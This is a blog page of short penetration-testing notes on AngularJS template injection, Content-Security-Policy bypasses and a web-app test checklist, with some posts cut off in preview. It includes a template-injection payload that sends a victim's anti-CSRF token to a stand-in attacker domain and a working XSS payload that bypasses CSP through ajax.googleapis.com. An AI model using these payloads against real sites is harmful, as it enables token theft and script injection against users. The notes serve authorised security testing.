
Posts

Showing posts from March, 2023

Pentesting AngularJS

Template Injection & Scope Hacking
- The attack is limited to $scope functions and variables.
- Check whether an application is using AngularJS and whether it is vulnerable to Template Injection or not.
- Check the source code for the `angular` keyword.
- Open dev tools --> Console --> `angular.element($0).scope()` - this lists the scope (all the elements in the page).
- Check the source code of the functions to see what each one is doing: Developer tools --> Debugger --> select app.js (whatever the JS filename is) --> search for that function.
- Check for any injectable variables (e.g. some empty or dynamic content).
- Call the function.
- Send the below payload as input and watch the connection going out, which carries the victim's anti-CSRF token: `{{Function_Name("https://attacker.domain/reach.php?x="+anti_csrf"")}}`
- Input `{{4-1}}` --> if the output is 3 --> VULNERABLE. Use this in any input or search parameters.
Going Beyond the Scope - XSS via Templat

Bypassing Content-Security-Policy

- CSP can be implemented via:
  - Response header
  - Meta tag: `<meta http-equiv="Content-Security-Policy" content="default-src 'self'; img-src https://*; child-src 'none';">`

Bypass CSP:
- via ajax.googleapis.com
- via Flash file
- via Polyglot file
- via AngularJS

Bypass CSP via ajax.googleapis.com
- Check `Content-Security-Policy: script-src 'self' ajax.googleapis.com` - here `script-src 'self' ajax.googleapis.com` means it allows only scripts from the same domain plus scripts from ajax.googleapis.com.
- `<div ng-app ng-csp id=p ng-click=$event.view.alert("XSS")><script src="//ajax.googleapis.com/ajax/libs/angular/1.6.6/angular.min.js"></script> <script async src=//ajax.googleapis.com/jsapi?callback=p.click></script>`

Bypass CSP via Flash File
- Works if the CSP is `Content-Security-Policy: script-src 'self'`; when the only restriction is script-src, we can bypass it using a Flash file: `<object t`

Simple Web Pentest Checklist

- Fuzz the application.
- Check if the application is using AngularJS.
- Check for Content Security Policy.
- Check whether the HttpOnly and Secure flags are set on the cookie or not, and check HSTS.
- If there is any payment involved --> try to perform race conditions.
- Log in as Admin and as a low-privilege user and check BAC & IDOR using ZAP/Burp.
- Check session vulnerabilities: take the sessionID of the user and log out --> return using the same sessionID.
- Check the password reset link --> request the email and go to the link --> see if there are any external URLs being used inside the webpage --> check the referer of the domain --> see if the password reset token is available in the Referer header.
- Check parameter pollution --> add the same parameter twice with a different variable/ID.
- Look for IDOR & Broken Access Control: use Burp Authorize or OWASP ZAP (Access Control from the Marketplace) to test.
- `AutoComplete=off` --> credit card processing/password --> check if the browse